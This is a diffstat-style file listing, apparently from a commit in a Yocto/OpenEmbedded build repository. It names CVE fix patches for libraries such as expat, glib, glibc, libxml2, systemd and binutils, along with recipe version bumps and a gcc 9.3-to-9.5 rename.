-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25235.patch283
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25236.patch129
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch131
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313.patch230
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25314.patch32
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25315.patch145
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-40674.patch53
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-43680.patch33
-rw-r--r--meta/recipes-core/expat/expat/libtool-tag.patch41
-rw-r--r--meta/recipes-core/expat/expat_2.2.9.bb29
-rw-r--r--meta/recipes-core/fts/fts_1.2.7.bb3
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch41
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch129
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch170
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch249
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch131
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch298
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch54
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch76
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch59
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch63
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch36
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch43
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch232
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch27
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch42
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch57
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch265
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch55
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch290
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch89
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch255
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch154
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch103
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch210
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch417
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch113
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch80
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch396
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch394
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch97
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb39
-rw-r--r--meta/recipes-core/glib-2.0/glib.inc6
-rw-r--r--meta/recipes-core/glib-networking/glib-networking_2.62.4.bb2
-rw-r--r--meta/recipes-core/glibc/cross-localedef-native_2.31.bb2
-rw-r--r--meta/recipes-core/glibc/glibc-version.inc2
-rw-r--r--meta/recipes-core/glibc/glibc.inc4
-rw-r--r--meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch66
-rw-r--r--meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch191
-rw-r--r--meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch206
-rw-r--r--meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch144
-rw-r--r--meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch180
-rw-r--r--meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch56
-rw-r--r--meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch124
-rw-r--r--meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch276
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2020-29573.patch128
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch68
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch73
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-38604.patch41
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-0687.patch82
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4813.patch986
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4911.patch63
-rw-r--r--meta/recipes-core/glibc/glibc/check-test-wrapper11
-rw-r--r--meta/recipes-core/glibc/glibc_2.31.bb50
-rw-r--r--meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch2
-rw-r--r--meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch65
-rw-r--r--meta/recipes-core/ifupdown/ifupdown_0.8.35.bb4
-rw-r--r--meta/recipes-core/images/build-appliance-image_15.0.0.bb10
-rw-r--r--meta/recipes-core/initrdscripts/files/init-install-efi.sh5
-rwxr-xr-xmeta/recipes-core/initrdscripts/initramfs-framework/finish9
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/rootfs2
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/setup-live2
-rwxr-xr-xmeta/recipes-core/initscripts/initscripts-1.0/checkroot.sh2
-rw-r--r--meta/recipes-core/initscripts/initscripts_1.0.bb2
-rw-r--r--meta/recipes-core/kbd/kbd_2.2.0.bb1
-rw-r--r--meta/recipes-core/libxcrypt/libxcrypt.inc2
-rw-r--r--meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch813
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch89
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch35
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch112
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch73
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch98
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch204
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch348
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch623
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch104
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch79
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch42
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch36
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch71
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch44
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch80
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch38
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch33
-rw-r--r--meta/recipes-core/libxml/libxml2/runtest.patch45
-rw-r--r--meta/recipes-core/libxml/libxml2_2.9.10.bb46
-rw-r--r--meta/recipes-core/meta/buildtools-extended-tarball.bb13
-rw-r--r--meta/recipes-core/meta/buildtools-tarball.bb2
-rw-r--r--meta/recipes-core/meta/cve-update-db-native.bb188
-rw-r--r--meta/recipes-core/meta/cve-update-nvd2-native.bb372
-rw-r--r--meta/recipes-core/musl/libucontext_git.bb2
-rw-r--r--meta/recipes-core/musl/musl-obstack.bb2
-rw-r--r--meta/recipes-core/musl/musl-utils.bb2
-rw-r--r--meta/recipes-core/musl/musl_git.bb2
-rw-r--r--meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch29
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2021-39537.patch30
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2022-29458.patch135
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-29491.patch45
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-50495.patch79
-rw-r--r--meta/recipes-core/ncurses/files/config.cache4
-rw-r--r--meta/recipes-core/ncurses/ncurses.inc12
-rw-r--r--meta/recipes-core/ncurses/ncurses_6.2.bb8
-rw-r--r--meta/recipes-core/os-release/os-release.bb4
-rw-r--r--meta/recipes-core/ovmf/ovmf-shell-image.bb1
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch49
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch53
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch41
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch51
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch32
-rw-r--r--meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch20
-rw-r--r--meta/recipes-core/ovmf/ovmf_git.bb16
-rw-r--r--meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb1
-rw-r--r--meta/recipes-core/psplash/files/psplash-start.service1
-rw-r--r--meta/recipes-core/psplash/files/psplash-systemd.service1
-rw-r--r--meta/recipes-core/psplash/psplash_git.bb2
-rw-r--r--meta/recipes-core/systemd/systemd-boot_244.5.bb (renamed from meta/recipes-core/systemd/systemd-boot_244.3.bb)0
-rw-r--r--meta/recipes-core/systemd/systemd-conf/wired.network1
-rw-r--r--meta/recipes-core/systemd/systemd-conf_244.3.bb3
-rwxr-xr-xmeta/recipes-core/systemd/systemd-systemctl/systemctl22
-rw-r--r--meta/recipes-core/systemd/systemd.inc4
-rw-r--r--meta/recipes-core/systemd/systemd/00-create-volatile.conf1
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2018-21029.patch120
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2020-13529.patch42
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2020-13776.patch96
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-33910.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch65
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch101
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch266
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2022-3821.patch47
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch115
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch264
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch182
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch32
-rw-r--r--meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch78
-rw-r--r--meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch285
-rw-r--r--meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch50
-rw-r--r--meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch278
-rw-r--r--meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch318
-rw-r--r--meta/recipes-core/systemd/systemd/systemd-pager.sh7
-rw-r--r--meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch30
-rw-r--r--meta/recipes-core/systemd/systemd_244.5.bb (renamed from meta/recipes-core/systemd/systemd_244.3.bb)40
-rwxr-xr-xmeta/recipes-core/sysvinit/sysvinit/rc2
-rw-r--r--meta/recipes-core/udev/eudev/init2
-rw-r--r--meta/recipes-core/udev/eudev_3.2.9.bb1
-rw-r--r--meta/recipes-core/update-rc.d/update-rc.d_0.8.bb4
-rw-r--r--meta/recipes-core/util-linux/util-linux.inc7
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch33
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch139
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch226
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch161
-rw-r--r--meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch270
-rw-r--r--meta/recipes-core/util-linux/util-linux_2.35.1.bb5
-rw-r--r--meta/recipes-core/volatile-binds/files/volatile-binds.service.in2
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2018-25032.patch347
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2022-37434.patch44
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2023-45853.patch40
-rw-r--r--meta/recipes-core/zlib/zlib_1.2.11.bb6
-rw-r--r--meta/recipes-devtools/apt/apt.inc6
-rw-r--r--meta/recipes-devtools/apt/apt/CVE-2020-3810.patch174
-rw-r--r--meta/recipes-devtools/binutils/binutils-2.34.inc20
-rw-r--r--meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch257
-rw-r--r--meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch26
-rw-r--r--meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch61
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch204
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch572
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch83
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch183
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch35
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch37
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch64
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch34
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch31
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch57
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch49
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch530
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch149
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch68
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb (renamed from meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb)8
-rw-r--r--meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb4
-rw-r--r--meta/recipes-devtools/build-compare/build-compare_git.bb2
-rw-r--r--meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake-native_3.16.5.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch255
-rw-r--r--meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake9
-rw-r--r--meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb2
-rw-r--r--meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb2
-rw-r--r--meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb3
-rw-r--r--meta/recipes-devtools/devel-config/distcc-config.bb1
-rw-r--r--meta/recipes-devtools/diffstat/diffstat_1.63.bb4
-rw-r--r--meta/recipes-devtools/distcc/distcc_3.3.3.bb3
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch236
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch198
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch62
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode_3.2.bb4
-rw-r--r--meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch60
-rw-r--r--meta/recipes-devtools/dnf/dnf_4.2.2.bb4
-rw-r--r--meta/recipes-devtools/dosfstools/dosfstools_4.1.bb2
-rw-r--r--meta/recipes-devtools/dpkg/dpkg.inc2
-rw-r--r--meta/recipes-devtools/dpkg/dpkg_1.19.8.bb (renamed from meta/recipes-devtools/dpkg/dpkg_1.19.7.bb)4
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb1
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c13
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs.inc4
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch49
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch41
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch57
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch42
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch22
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch76
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest1
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb (renamed from meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb)18
-rw-r--r--meta/recipes-devtools/elfutils/elfutils_0.178.bb2
-rw-r--r--meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch72
-rw-r--r--meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb1
-rw-r--r--meta/recipes-devtools/file/file_5.38.bb2
-rw-r--r--meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch32
-rw-r--r--meta/recipes-devtools/flex/flex/check-funcs.patch67
-rw-r--r--meta/recipes-devtools/flex/flex_2.6.4.bb7
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch204
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch600
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch659
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5.inc (renamed from meta/recipes-devtools/gcc/gcc-9.3.inc)18
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch44
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch)6
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch)0
